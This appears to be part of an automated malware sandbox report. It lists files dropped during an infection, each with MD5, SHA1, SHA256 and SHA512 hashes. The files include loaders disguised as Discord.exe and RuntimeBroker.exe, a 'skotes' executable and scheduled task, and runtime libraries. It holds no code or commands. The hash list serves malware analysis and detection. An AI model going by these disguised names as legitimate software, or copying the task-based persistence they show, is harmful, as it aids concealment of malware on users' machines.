SHA256 dada298d188a98d90c74fbe8ea52b2824e41fbb341824c90078d33df32a25f3d
SHA512 1d05f474018fa7219c6a4235e087e8b72f2ed63f45ea28061a4ec63574e046f1e22508c017a0e8b69a393c4b70dfc789e6ddb0bf9aea5753fe83edc758d8a15f

C:\Users\Admin\AppData\Local\Temp\a\test30.exe

MD5 e9289cac82968862715653ae5eb5d2a4
SHA1 9f335c67384fc1c575fc02f959ce1f521507e6e1
SHA256 e2f0800a6b674891005a97942ff0cf8ab7082c2ecfc072d5c29cd87ecb1f09f6
SHA512 81135caacfddd75979a22af40b9fa97653add7f94bb6bf8649a4c1494ed041cbe42eb8b2335a21099421bf02ed4ce589052800b7c8ab5d7a27e3329e8d7427fe

C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe

MD5 4489c3282400ad9e96ea5ca7c28e6369
SHA1 91a2016778cce0e880636d236efca38cf0a7713d
SHA256 cc68b1903e22d22e6f0a29bcdf46825d5c57747d8eb3a75672a4d6930f60fe77
SHA512 adaeab8aa666057ff008e86f96ae6b9a36ff2f276fdd49f6663c300357f3dc10f59fac7700bb385aa35887918a830e18bddaa41b3305d913566f58aa428a72b0

C:\Users\Admin\AppData\Local\Temp\a\Discord.exe

MD5 bedd5e5f44b78c79f93e29dc184cfa3d
SHA1 11e7e692b9a6b475f8561f283b2dd59c3cd19bfd
SHA256 e423c72ea1a279e367f4f0a3dc7d703c67f6d09009ed9d58f9c73dac35d0a85c
SHA512 3a7924196830b52d4525b897f45feb52ec2aca6cd20437b38437f171424450fd25692bd4c67ccde2cf147f0ed6efcef395ea0e13b24f0cf606214b58cf8284de

C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe

MD5 7ae9e9867e301a3fdd47d217b335d30f
SHA1 d8c62d8d73aeee1cbc714245f7a9a39fcfb80760
SHA256 932cb7b1080180487be4b5754bd92600409bafda80d412018a792a8930c6a46c
SHA512 063648705e1817a1df82c9a595e4bbe8e0b1dbb7e31a6517df59905ebe7f22160f4acb55349d03dfe70744a14fd53c59a4c657c7a96646fcccf1c2214fc803dd

C:\Users\Admin\AppData\Local\Temp\a\Loader.exe

MD5 e9a138d8c5ab2cccc8bf9976f66d30c8
SHA1 e996894168f0d4e852162d1290250dfa986310f8
SHA256 e63b41bfdd3a89b6ebcfc05db158fdc399dbc081e49b01498831a62df34defc3
SHA512 5982fc759c8b1121ab5befaac53e1521931f06d276140195fa1fcbcd1069f546253e366ef4cc37245b3bc2ed60c4b8d0583f133a1264efd77938adf456a08ccc

C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe

MD5 2a34f21f31584e1f50501503fddf1ddd
SHA1 16e3daa24bcea193afb0bb39e2eace8875d59da6
SHA256 3dece3e441fcc172dddbac40f56c0fba0b53e2ae718045987998c622764aff84
SHA512 916b235a14c78d7eea193e2de5ca313d35f3d144c12646d8328faa57f2e1547c888260eb93b228e427bad0a1c688f99bb98f1dd0a5e8428c5aa2b1d11ea612e5

C:\Windows\Installer\e5a4d75.msi

MD5 dc1ab7ce3b89fc7cac369d8b246cdafe
SHA1 c9a2d5a312f770189c4b65cb500905e4773c14ad
SHA256 dde77dd3473d3d07c459f17cd267f96f19264f976f2fcc85b4bbbecf26487560
SHA512 e554b8b36a7a853d4e6efb4e6faf2d784f41e8d26edafbb1689a944bf0a7a4b58258d820a3fada1496b8c8d295d8771fc713b29127d54a3fbc317659b7565cbe

C:\Windows\WinSxS\Temp\InFlight\8004200ac34cdb0101000000640f901a\8004200ac34cdb0102000000640f901a_manifest

MD5 42d8bbe898b35473852d83f53ef6759d
SHA1 052f1897a299fb3c33cfa8eb3e37c8d5654f3179
SHA256 5908e59bf26941730a1f3ab117a7d699984d39cd690fca74dbe20030745e8acb
SHA512 3d871592d0ff3368306df9372cb46754a818c5b0b3c1493aa9189030245cc44f4ce7f55c626c8b00704c1908ff84ae3ea82fa63b8ebeaedac1fab6d758ed68b4

C:\Windows\WinSxS\Temp\InFlight\8004200ac34cdb0101000000640f901a\6767220ac34cdb0105000000640f901a_catalog

MD5 d81e69280e14e0a97644ae0044db662e
SHA1 c97dbe8deb8e1762313c3e6613a6640f070df4b1
SHA256 a951d53950c367acc37622f0dd619a954df5de2c4ec40296e6636605aa33714a
SHA512 dcd8229efd496735aab49f6595ad545f082b0364e984346f76a6503425c84e82af2d30684dfd302ef0c70fb65bc6b8e3731953728cf38637f7fe76580b82d490

C:\Windows\WinSxS\Temp\InFlight\8004200ac34cdb0103000000640f901a\8004200ac34cdb0104000000640f901a_atl80.dll

MD5 3c7def3cbbca6284867aa4621d5d8a54
SHA1 4bd9852f1f063b9fd1e1829b756d381e14609fa7
SHA256 db18738202dcda842dce505ecd0b858d7b4c55886cac29827305f0dc3839143a
SHA512 1f9e89114a579bbb0c175d5fb587d58a923a0f556361b2f6c5ae3ffeb139539733e46edb3df1627fa630d5bc80cdf5ff311ca75754ca306345569cd48f51f2c4

C:\Windows\WinSxS\Temp\InFlight\aff8170bc34cdb010f000000640f901a\aff8170bc34cdb0110000000640f901a_msvcr80.dll

MD5 e4fece18310e23b1d8fee993e35e7a6f
SHA1 9fd3a7f0522d36c2bf0e64fc510c6eea3603b564
SHA256 02bdde38e4c6bd795a092d496b8d6060cdbe71e22ef4d7a204e3050c1be44fa9
SHA512 2fb5f8d63a39ba5e93505df3a643d14e286fe34b11984cbed4b88e8a07517c03efb3a7bf9d61cf1ec73b0a20d83f9e6068e61950a61d649b8d36082bb034ddfc

C:\Windows\WinSxS\Temp\InFlight\aff8170bc34cdb010d000000640f901a\aff8170bc34cdb010e000000640f901a_manifest

MD5 541423a06efdcd4e4554c719061f82cf
SHA1 2e12c6df7352c3ed3c61a45baf68eace1cc9546e
SHA256 17ad1a64ba1c382abf89341b40950f9b31f95015c6b0d3e25925bfebc1b53eb5
SHA512 11cf735dcddba72babb9de8f59e0c180a9fec8268cbfca09d17d8535f1b92c17bf32acda86499e420cbe7763a96d6067feb67fa1ed745067ab326fd5b84188c6

C:\Windows\WinSxS\Temp\InFlight\aff8170bc34cdb010f000000640f901a\aff8170bc34cdb0111000000640f901a_msvcp80.dll

MD5 4c8a880eabc0b4d462cc4b2472116ea1
SHA1 d0a27f553c0fe0e507c7df079485b601d5b592e6
SHA256 2026f3c4f830dff6883b88e2647272a52a132f25eb42c0d423e36b3f65a94d08
SHA512 6a6cce8c232f46dab9b02d29be5e0675cc1e968e9c2d64d0abc008d20c0a7baeb103a5b1d9b348fa1c4b3af9797dbcb6e168b14b545fb15c2ccd926c3098c31c

C:\Windows\WinSxS\Temp\InFlight\aff8170bc34cdb010d000000640f901a\00201f0bc34cdb0113000000640f901a_catalog

MD5 790adaf5e825415e35ad65990e071ae0
SHA1 e23d182ab1edfef5fd3793313d90935fc034abc8
SHA256 88b03fe13d2710ad787d5d96cd0e5cbeda3a61c2a0a2bdc0c0984a48365242e2
SHA512 050bbad3122cd0627ecacaf3fb24ebf1e1845f209c33ed6607b282d9dcd4f5d99e345df3a99e4344af2aba6e7923c8483e8d5a8d709bf97f3cb37926d975fdad

C:\Windows\WinSxS\Temp\InFlight\aff8170bc34cdb010f000000640f901a\00201f0bc34cdb0112000000640f901a_msvcm80.dll

MD5 cae6861b19a2a7e5d42fefc4dfdf5ccf
SHA1 609b81fbd3acda8c56e2663eda80bfafc9480991
SHA256 c4c8c2d251b90d77d1ac75cbd39c3f0b18fc170d5a95d1c13a0266f7260b479d
SHA512 c01d27f5a295b684c44105fcb62fb5f540a69d70a653ac9d14f2e5ef01295ef1df136ae936273101739eb32eff35185098a15f11d6c3293bbdcd9fcb98cb00a9

C:\Windows\WinSxS\Temp\InFlight\0e47260bc34cdb0115000000640f901a\0e47260bc34cdb011c000000640f901a_catalog

MD5 7e5e3fe0342a776b1974ba1158b8e458
SHA1 7e2e14e2a0658441828de084116afdec5cc63697
SHA256 2d3cb7907b1336ea5889a2b731d5e97ad40903a4efd2287c1c117bc30f208f46
SHA512 9f0f1f1e6439f101b04888be54a3711c8439d569b0dc962f29ac26c3637fe9a882c9b0d52d50e83b7562a302673f2d22428a56e6aaf60ad30fc873ffa256efd2

C:\Windows\WinSxS\Temp\InFlight\0e47260bc34cdb0117000000640f901a\0e47260bc34cdb011b000000640f901a_mfcm80u.dll

MD5 ddad68e160c58d22b49ff039bb9b6751
SHA1 c6c3b3af37f202025ee3b9cc477611c6c5fb47c2
SHA256 f3a65bfc7fce2d93fdf57cf88f083f690bc84b9a7706699d4098d18f79f87aaa
SHA512 47665672627e34ad9ea3fd21814697d083eeeafc873407e07b9697c8ab3c18743d9fcb76e0a08a57652ea5fb4396d891e82c7fde2146fc8b636d202e68843cf4

C:\Windows\WinSxS\Temp\InFlight\0e47260bc34cdb0117000000640f901a\0e47260bc34cdb011a000000640f901a_mfc80.dll

MD5 1b7524806d0270b81360c63a2fa047cb
SHA1 d688d77f0caa897e6ec2ed2c789e77b48304701f
SHA256 ceef5aa7f9e6504bce15b72b29dbee6430370baa6a52f82cf4f2857568d11709
SHA512 b34539fbda2a2162efa2f6bb5a513d1bb002073fa63b3ff85aa3ade84a6b275e396893df5ab3a0a215cade1f068e2a0a1bbd8895595e31d5a0708b65acec8c73

C:\Windows\WinSxS\Temp\InFlight\0e47260bc34cdb0117000000640f901a\0e47260bc34cdb0119000000640f901a_mfc80u.dll

MD5 ccc2e312486ae6b80970211da472268b
SHA1 025b52ff11627760f7006510e9a521b554230fee
SHA256 18be5d3c656236b7e3cd6d619d62496fe3e7f66bf2859e460f8ac3d1a6bdaa9a
SHA512 d6892abb1a85b9cf0fc6abe1c3aca6c46fc47541dffc2b75f311e8d2c9c1d367f265599456bd77be0e2b6d20c6c22ff5f0c46e7d9ba22c847ad1cbedc8ca3eff

C:\Windows\WinSxS\Temp\InFlight\0e47260bc34cdb0117000000640f901a\0e47260bc34cdb0118000000640f901a_mfcm80.dll

MD5 c84e4ece0d210489738b2f0adb2723e8
SHA1 63c1fa652f7f5bd1fccbe3618163b119a79a391c
SHA256 ed1dcdd98dac80716b2246d7760f0608c59e566424ac1a562090a3342c22b0a7
SHA512 3ee1da854e7d615fa4072140e823a3451df5d8bebf8064cc9a399dec1fb35588f2a17c0620389441ca9edd1944c9649002fe4e897c743fe8069b79a5aa079fe2

C:\Windows\System32\Sysprep\ActionFiles\Respecialize.xml

MD5 1a308d1eefd68d68f363fd006970e860
SHA1 eafdb2bc1180a9ef4b27764a43f57fcbf49b0695
SHA256 2d28a4067b39aef4ab9f21d91471a472fdc967d8ffdf8d1d52d88fcb5dc73dd8
SHA512 c50fa0ce5d8ee25bcc1e408b9fc699506f9c3f1c636afb6846650864d4567e5dfb5589ce7673f2e88c91941104ddd203c42ab577dcd9e4d20e37acdc1cedc263

C:\Windows\System32\Sysprep\ActionFiles\Cleanup.xml

MD5 feaf51cddc45e08b32fd9ccf592ea3db
SHA1 92cf0f440e08e4b93a866c0aeeaebe441076352f
SHA256 5c4345299f33f23579a8f8343e1c9d957aef890eae80df47b541048c22932c4a
SHA512 9aa67e94d23ab9dadea5a815d205a38f2496f3fc39efaca1c71aa328ed2ce6e881c0533742e61d8e6cf4652cddee58b2e2fcf6d41b9b0e1c5a804903a47db09c

C:\Windows\System32\Sysprep\ActionFiles\Specialize.xml

MD5 04f1610ecefc2481fca998471ec549c5
SHA1 8888feaa11bc5a1e969bc41c494b5f4aef6bde92
SHA256 051d63e94fcc41d13ee1175df5e48c6bb2708d60121ce877668b06ec55071caf
SHA512 f66d209b2335dead1c4ec24cdac8f1f425b64a81ff88504330793be6be9afcc8fcfcfbe5338adb5d5474c6261e3d3d17e2df84db63e08e3675ba59f0c0af0277

C:\Windows\System32\Sysprep\ActionFiles\Generalize.xml

MD5 f5ac2f018e7d540edfdaa300aa07925d
SHA1 d793a5753f496c2da7c51980851ab5a95d8017e3
SHA256 b0c9c30cb247ffc2ac9a0b72ae58ffeff7de06c0ab8e02b1f8d9bd42386e8cd4
SHA512 13b0fb2f964dec2d6caf64b8a11cc7e22a84b59a1f603a6a97d798ad9d7ab1ada7852fc9c44621f98e5fd3c6cc5228e27431d9d0d11dc2e9139eb733966d280d

C:\Windows\WinSxS\Temp\InFlight\0e47260bc34cdb0115000000640f901a\0e47260bc34cdb0116000000640f901a_manifest

MD5 97b859f11538bbe20f17dfb9c0979a1c
SHA1 2593ad721d7be3821fd0b40611a467db97be8547
SHA256 4ed3ba814de7fd08b4e4c6143d144e603536c343602e1071803b86e58391be36
SHA512 905c7879df47559ad271dc052ef8ae38555eac49e8ac516bc011624bf9a622eb10ee5c6a06fbd3e5c0fa956a0d38f03f6808c1c58ee57813818fe8b8319a3541

C:\Windows\WinSxS\Temp\InFlight\0794530bc34cdb0126000000640f901a\0794530bc34cdb0127000000640f901a_mfc80chs.dll

MD5 afa7e91c8c9566e03fb1620f95230b93
SHA1 75057a0e936032ec9cbc77559241720f58bfab84
SHA256 4eaf1750a573bab5c853e7714efcc84ff2fcf992ad935fd01af9e2a5bd01a93a
SHA512 b9c34166555f42d4a4e754131fd2868b4fc2965ac8519a6eeed8a32f6c67e1e6e5b4daa93175967f5f687d8333ca53c4d183a2177191a81bc01e89b7cbdc9bb3

C:\Windows\WinSxS\Temp\InFlight\0794530bc34cdb0124000000640f901a\0794530bc34cdb0125000000640f901a_manifest

MD5 56613508687d065362302ff388cd5e82
SHA1 830d6459350dd1ab3b1f070135425a93395782b1
SHA256 2f79707c5ea8937e8887b642cfa4ce682c52816c20207c1588fd5a1e39e88c1c
SHA512 66c650cdcf5d15d313b7b0f3afdab717f075bc0ac560b75cf2ea5375c62efebe01a890204a3e74835b65b60113120815c7dd564f78564029d1f5170d63990814

C:\Windows\WinSxS\Temp\InFlight\0794530bc34cdb0126000000640f901a\28f6550bc34cdb012f000000640f901a_mfc80kor.dll

MD5 fec4610f1174136b1d3db2ae37924ce8
SHA1 ba94e77bb29b9b74ea8e2a8fd005dc3083166f3c
SHA256 a6d0b3d20e67c26f7c247f2eeb8dba723b396b118a1b9eaa4568c474826ea740
SHA512 9144a0243e41ec17628a740913a745261346efa2dff3f61d48ccf186f30a1527f6a4f5cb3f7f7727d7bfd4103e9fc90cae1e0cefbc1d8d042218d9d2ea869a36

C:\Windows\WinSxS\Temp\InFlight\0794530bc34cdb0126000000640f901a\28f6550bc34cdb012e000000640f901a_mfc80jpn.dll

MD5 012031b19f0a9f6431997c79e1893822
SHA1 2265c92b3ed9ec169e2c362e448b0e3f449528a3
SHA256 ed296b3dd004c8845a7015a3a5ef3a92331e30535204a02995323681cbd342ab
SHA512 b4cca371481b349546ad09c40461258a99e5ad6cf7b66fe040a37f90071c420cc41e74f495141a490b4848b66da876ad8b91ac7c14a328cf5c4ccaadfd3e226e

C:\Windows\WinSxS\Temp\InFlight\0794530bc34cdb0126000000640f901a\28f6550bc34cdb012d000000640f901a_mfc80ita.dll

MD5 cb23b162ac655f24c6711a5f5df348c6
SHA1 e4e0e803b9297b0937824c53f227598998229463
SHA256 6498ee1449b61b40e2dab46f0b3dfa15f17590d7aa87919580748ec9d4bc2c55
SHA512 460d235818cd83d9020a13f47b24aadc777e4bdc81a6387d8bb59daf37eaf930c70ace5e238fe2fa34491a03b3972f11a4bdb8d30ff98801acff82630b6d24a2

C:\Windows\WinSxS\Temp\InFlight\0794530bc34cdb0126000000640f901a\28f6550bc34cdb012c000000640f901a_mfc80fra.dll

MD5 eec2f9e4d790bccdbc542715ab613579
SHA1 8993e9f0cc4657e40866efba0cab7e077060cea8
SHA256 e283b055a0b9f522ff415b78f100542255aa07cb17c1eeb3885e75326d9dbc66
SHA512 89c083c820798872f3feecffccc1a5ccef9a367c8af2170ec06b04a64a234dd03cdfe250b31b5969f87caa8e7ea8393fbcbbcbf16d83c35105814501b6be08e8

C:\Windows\WinSxS\Temp\InFlight\0794530bc34cdb0126000000640f901a\28f6550bc34cdb012b000000640f901a_mfc80deu.dll

MD5 1e6719ebeb1d368e09899a9d0ddfad70
SHA1 fc510a6dbe0d9180f203af651e186979b628675f
SHA256 734eb909c54a0a1c53aa5177727660b1c64f3d261b222feaec76fc5853300661
SHA512 c5753b79d97204c130a2c0a46d7717e74c140d207a446918df113a6c460f538afe0a48af52360d8a501104283311667ce8dd23b4d3e65b7ee99939a791c25ad6

C:\Windows\WinSxS\Temp\InFlight\0794530bc34cdb0126000000640f901a\28f6550bc34cdb012a000000640f901a_mfc80enu.dll

MD5 9090454e6772f7cfbce240bf4dc5f7e8
SHA1 3afd27af1fbb5d2efde463869a1e6465affbcdd8
SHA256 a532044dfd1fa6463516125ea74c250762de4dacbe613f8ad2ff72d50c0b9585
SHA512 4691138b2e32447a6300a17967c1221153b5b514ee0edcd25a135dce2a6eefea9cc7f3fc516a9b3482feb62dc190a7f4192bcf15d9793832f828078557e24cdf

C:\Windows\WinSxS\Temp\InFlight\0794530bc34cdb0126000000640f901a\28f6550bc34cdb0129000000640f901a_mfc80esp.dll

MD5 d47599748b3ecf645c47caa0bc24a7cd
SHA1 2f47846b9308fe4b444363f0863f394a1b13c938
SHA256 10fd5eebe39acd996309da073b247b365cbc0f48f43da3062463ea9f712319ca
SHA512 30b0f056123657eaca8f97138e1ca5c2981575420938ee7ed645e4d62f2a159c011eff08c2ee20ac68504bd59d890dbc030718a9ba185871b07dee9851cf2608

C:\Windows\WinSxS\Temp\InFlight\0794530bc34cdb0126000000640f901a\0794530bc34cdb0128000000640f901a_mfc80cht.dll

MD5 2dca32742f80bb37e159b651f8eef44b
SHA1 dcd0265fbe8efd63c235ed4611aecc4b935c057c
SHA256 a7eaf2b5df991654500ffed95d3950a46dd0fe05cddcccd77490f125e22b80d6
SHA512 40e1533f6989955f537d556ab28ff0be44658309eef5d40093bf3fcec39ad85ea14bb2b880ff5c067ccfc257a35361c25aac087e0463bafe39fb265b8a0825ee

C:\Windows\WinSxS\Temp\InFlight\0794530bc34cdb0124000000640f901a\28f6550bc34cdb0130000000640f901a_catalog

MD5 dfe03b4ff0ef67f7a08a7d88b3e4bde3
SHA1 bf907a1b27db3bf3c10da685d9cb4cbff9155e6b
SHA256 26340819d2ef86080d9001c6f2737d70fd6602ddf4b86b6c26b326ef81cc3342
SHA512 3d1f6773a476b2f84f53a288f1a1ef0fc44a58f8a9c25f9773871cb4f4f9cb81cbe6c242665d1cba8ba327c441fc5b13f254e1657258a841102cc571185d70bd

C:\Windows\WinSxS\Temp\InFlight\7455960bc34cdb0138000000640f901a\c4b8980bc34cdb013c000000640f901a_catalog

MD5 259f7eac836fc1fe0871c47276f4d779
SHA1 42b1e4138edcfc60622167ee60a1af5ca00a813a
SHA256 a2492fa83366394b7c17fa6c9650ce5688b887d0ad0ad79743a3422debf4d997
SHA512 053892d867c3bc4c10e34811da34337055035f599c09566dbf678dfad97f4fac7b8459fdb603c4a69e5848a455f319c3a6212e016638f493efe1ddc3ebf02e1f

C:\Windows\WinSxS\Temp\InFlight\c4b8980bc34cdb013a000000640f901a\c4b8980bc34cdb013b000000640f901a_vcomp.dll

MD5 72f11c118e514544f1d2981c7396e4f7
SHA1 3ae68e8d5038620d5a04f5893c8c9ff8edd2cf42
SHA256 2ea4098722586932acf9b180374b019ed6d6469825392373e45b3db459b5eaef
SHA512 91cb2ea7db5958141d4c47f4ddb66d24383ffe6b74a12de753ca93764af6c1c41d6a9572777818d6f3ce226aa06e0f168cd28551006b59a89fe1235abd31f8cd

C:\Windows\WinSxS\Temp\InFlight\7455960bc34cdb0138000000640f901a\7455960bc34cdb0139000000640f901a_manifest

MD5 d1240d97b0e1f80d82ad12782dfe8ebe
SHA1 59601898276ff76b40c97d493d4b9ca2de6fccac
SHA256 be8327c8d71b61893d455130c2b5a8635e451a7d95bbfaf29432b3844a7ac109
SHA512 6c64a46715949c36e26045fcf12dc468c6d39782eb0165f966d251dfff40af2b065283b8f9391dddc66c98a5c3db7b92844e784355d73e1adbad1f37abf384de

C:\Windows\WinSxS\Temp\InFlight\14f1b20bc34cdb0144000000640f901a\14f1b20bc34cdb0145000000640f901a_manifest

MD5 856bbf8e45a26c912bd447ec12dc17db
SHA1 e48a1eb7844ec81dcc0a66905619afeee67666a5
SHA256 863e67b018e99e1685f03d4fed538f8269332570887fc17534dd3637b7aa6a41
SHA512 bb79bd9a3a06fb6cfd3312edb766b8ef5c03aa250ccfa17add8799eec06cce88be9369db452d20b09519a910878e1840513404b5df59289dd84bedd01771ad01

C:\Windows\WinSxS\Temp\InFlight\14f1b20bc34cdb0144000000640f901a\14f1b20bc34cdb0146000000640f901a_catalog

MD5 57fd064e95d299507600f6d80aa6b578
SHA1 9947dd086424adb4d62feb33fb9ebb52fa11c281
SHA256 f7bf65ca621d8ad32ead1500a08827be239d0f49d83dc20dabf57d2eb17adbd7
SHA512 fd9e17009e0e88b725fc6aa014a95e9516543f54cadbb6a71c1c1f39f4def4ad0df2d8f55720e8b1a54eb2ebce6c42c8c899e33e490dd304eb014ccab6db9c44

C:\Windows\WinSxS\Temp\InFlight\2f2bcd0bc34cdb014e000000640f901a\5b8ecf0bc34cdb014f000000640f901a_manifest

MD5 a785ce93c7468dbcdfa7bc379f8ffddc
SHA1 d10440930cc994409e920d94c7c45f0405d60422
SHA256 3a131923c7403c1eef33b59fdca57d8272549b7912d2b522fc8a4c840cbca735
SHA512 8e514e11887f6a198756f4a4b1a584e0a337abef90f1a9330436e21e75cd5fffe7e90a80424018c03ea55ae43758fcfa16f5a7c266d5476ce8f985f76ce5cada

C:\Windows\WinSxS\Temp\InFlight\2f2bcd0bc34cdb014e000000640f901a\5b8ecf0bc34cdb0150000000640f901a_catalog

MD5 29c0897d5d709a2394960b26999126d0
SHA1 56501eda82ecf05c4a90b035be62b422a24c71c3
SHA256 dd72f7ab2def5f75f58d01b24643b308750c38685daaed50bcddf61c18460dee
SHA512 75fb603d58105f0a2aacade320e2eab212dd6b3d6fcbdab09ca137d123cc1decb88c848b81e017bbddd41d9591900ff723aed90fb0d6166e8c62e3c14d39166e

C:\Windows\WinSxS\Temp\InFlight\64dbdd0bc34cdb0152000000640f901a\64dbdd0bc34cdb0153000000640f901a_manifest

MD5 e7bf4cf966c7c8d01315dcb7ac64f31d
SHA1 09105c886a83677e49ce6ef47f8cf1a047214aed
SHA256 8064287e17720b822f845352fe724595fdafaf9dd2dbf21493327d8c50719a9e
SHA512 6f6d05ebed3541be650f0744f8978b88bb7699c60406aeeebd9d0b3d28d4dc587633ad3a270964e05d96afcd5ef47c333e7563ef79e44bb72b4670f5acf84fbb

C:\Windows\WinSxS\Temp\InFlight\64dbdd0bc34cdb0152000000640f901a\64dbdd0bc34cdb0154000000640f901a_catalog

MD5 98dc3a0de986c24562ca071211f7dfbe
SHA1 1b016b20820eef49e7baecb93d19e0a0177110e8
SHA256 91ca50cec42075fff02b366323bf3b45d2053b24544bd12b622b65621bd0edd5
SHA512 f76b8972e2175fd84a56b3139c31a87fbfafd69e131da46a96225ba9cce9a4a726fb007b31de08406c9b3f51d8fd0fd32827a485c668d9c92b54f24f1384bc53

C:\Windows\WinSxS\Temp\InFlight\753cff0bc34cdb015c000000640f901a\753cff0bc34cdb015d000000640f901a_manifest

MD5 53094430f66951325c1b88a4f0ca374d
SHA1 f081561658705610adad4c30e757312491edf9e0
SHA256 4594558e51587c0edf1f3f95a0d4b8749b3ea3b6c8b76b31b13f1ca1d3e2f4af
SHA512 75ead79c7392de2be0964d0399da4b6b883bfc1e53cb099ec6bf2e4da594b24b52e1c08ab6ba5b0b18df7e64dac0979c2a57e0b20ee6fdd5d54340fff8f6d462

C:\Windows\WinSxS\Temp\InFlight\753cff0bc34cdb015c000000640f901a\753cff0bc34cdb015e000000640f901a_catalog

MD5 93615fe0e4458e717bba670c9b162e84
SHA1 ce99f878d2528efc821d05462313c8ef99be8c2f
SHA256 d14225a52543aa5a9605b00dd7574812bf89c605ebc73a9730e1e386bfc965f8
SHA512 f87ba88b0b2bf186872bdf226ea137463a773b710cd4505e50fd22e7e3e629beab26af32313fe09bb4d1a0c621d95df3e1d0a957d6d5a43868a1c4953ca3343f

C:\Windows\WinSxS\Temp\InFlight\f362250cc34cdb0166000000640f901a\fac4270cc34cdb0168000000640f901a_catalog

MD5 c664656654dab45beb0d352077a884fb
SHA1 5bdb2ee6d91ee321fef177e534c324df96baef9d
SHA256 b3beb16c28db357e654a6b132f59cd48cb95cee949d7b97587f8f02f233f3ce1
SHA512 f9ce3655342a07a29b5338ab5b78ba0b6cbc94eeb1d0538967dd2c23cbbda6797326763e16f609c179b43e67503a87f76d8c306f0ab449f1601f13d7f7173a15

C:\Windows\WinSxS\Temp\InFlight\f362250cc34cdb0166000000640f901a\fac4270cc34cdb0167000000640f901a_manifest

MD5 11d6a2e757da71254bfc61d26f06884d
SHA1 9d82fa5ce12ddfe639af6c89c750758d8e72a20a
SHA256 58ae1580121afe06ce2b858b96b6ab893a8d105b17fe54d85711a969c3303dc4
SHA512 0074430d25861b7b18cfa2c3e5bf728b51b676c5a30799986305be94c40ee1dca8e3c00a6279c801771f44d4ed551f73a0dc5c5792715c1c10361712d9ef8b29

C:\Config.Msi\e5a4d78.rbs

MD5 4e9c844d4d3ab92552ddbe489d386520
SHA1 41639bd096aae3954f5ce6470d87bee74f403007
SHA256 3162c0fbf552d76aff8da0cfcf841228fbe716e81a022606dd7c67e015a17eb9
SHA512 335466f15d8d6496d438d48249079d7782dfdab12f406a33f7ce810e26659e85b0799f09f0dbe556fc5638ddb0f57f1b04d282513efdb422ed3d9f8a043a14e4

C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe

MD5 6e05e7d536b34f171ed70e4353d553c2
SHA1 333750aa2d2121ad3e332ada651add83170b7bf8
SHA256 fd0754a2ef3567859db0bf3c75f18ec50aaeae6a7561aff9e7f6c7775a945ed7
SHA512 148be9744466f83ae89650fa461132266300cea8b08c793a320416f4a71a19fd3caf2e9258664040fcc44c06c77eb84bd5a7d1c47839d147c8ed5b5bee69610f

C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe

MD5 732746a9415c27e9c017ac948875cfcb
SHA1 95d5e92135a8a530814439bd3abf4f5cc13891f4
SHA256 e2b3f3c0255e77045f606f538d314f14278b97fd5a6df02b0b152327db1d0ff6
SHA512 1bf9591a04484ed1dab7becb31cd2143c7f08b5667c9774d7249dbd92cf29a98b4cabfa5c6215d933c99dc92835012803a6011245daa14379b66a113670fbb08

C:\Users\Admin\AppData\Local\Temp\a\leto.exe

MD5 a0507bfe0c6732252a9482eb0dd4eb0c
SHA1 af318e66c86daf48a5dc8511a5e2a0c870edd05d
SHA256 c3ee04588440b04a39dd6a603e91492f9f52fb20c7a43dcdc606b227742a097e
SHA512 4e4f699aa5cdca9d296bc6f3e3d9ef824430bbaa14db27aeb973f7bf576900fc5ca33946034475bfe696bac026cab14f0addf93018e7099a1b04ebc3a75a2c97

C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe

MD5 2cbd6ad183914a0c554f0739069e77d7
SHA1 7bf35f2afca666078db35ca95130beb2e3782212
SHA256 2cf71d098c608c56e07f4655855a886c3102553f648df88458df616b26fd612f
SHA512 ff1af2d2a883865f2412dddcd68006d1907a719fe833319c833f897c93ee750bac494c0991170dc1cf726b3f0406707daa361d06568cd610eeb4ed1d9c0fbb10

C:\Windows\SysWOW64\directx\websetup\dsetup.dll

MD5 984cad22fa542a08c5d22941b888d8dc
SHA1 3e3522e7f3af329f2235b0f0850d664d5377b3cd
SHA256 57bc22850bb8e0bcc511a9b54cd3da18eec61f3088940c07d63b9b74e7fe2308
SHA512 8ef171218b331f0591a4b2a5e68dcbae98f5891518ce877f1d8d1769c59c0f4ddae43cc43da6606975078f889c832f0666484db9e047782e7a0ae4a2d41f5bef

C:\Windows\SysWOW64\directx\websetup\dsetup32.dll

MD5 a5412a144f63d639b47fcc1ba68cb029
SHA1 81bd5f1c99b22c0266f3f59959dfb4ea023be47e
SHA256 8a011da043a4b81e2b3d41a332e0ff23a65d546bd7636e8bc74885e8746927d6
SHA512 2679a4cb690e8d709cb5e57b59315d22f69f91efa6c4ee841943751c882b0c0457fd4a3376ac3832c757c6dfaffb7d844909c5665b86a95339af586097ee0405

C:\Windows\System32\Tasks\skotes

MD5 117e76b5b31d6005009da6e31a063f91
SHA1 d993d259fe6e1752c88a97391f05707fef9e1fac
SHA256 3fd7a754413c9ed99899842dba33254274cb2f51de4ee54df0ce337628866d13
SHA512 eff612a0f4a0fbd96f8421e9fcb429819835e474a06512f0fd6b4762ec5d49ea2a3ae2607e86f3f25cee1323dc1e9c25bb0637e6eabbae3bb368b0677b48267c

C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe

MD5 f0aaf1b673a9316c4b899ccc4e12d33e
SHA1 294b9c038264d052b3c1c6c80e8f1b109590cf36
SHA256 fcc616ecbe31fadf9c30a9baedde66d2ce7ff10c369979fe9c4f8c5f1bff3fc2
SHA512 97d149658e9e7a576dfb095d5f6d8956cb185d35f07dd8e769b3b957f92260b5de727eb2685522923d15cd70c16c596aa6354452ac851b985ab44407734b6f21

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 7229bce5ce94ad8c3efdac6116ca0dfd
SHA1 bab536edb7b176deedc34f51bca00786358a9238
SHA256 786cacdf01a6f995fa366ec96f869e36aea02b478426595de4d72ce297b92312
SHA512 147165e60b94781f32180d41107d81504cf6c8a08a7b235c0680af1708447341ab6cb42e4d8ba310b4425d30bb4961f91da1801f45285f32974ccd9f5a419f4b

C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe

MD5 78c586522f986994aa77c466c9d678a8
SHA1 4b9b13c3782ae532a140a33ba673dc65a37aa882
SHA256 498ac6b747691eb456fc24ac26c3932effca9b46e39740963120f711e72aefc9
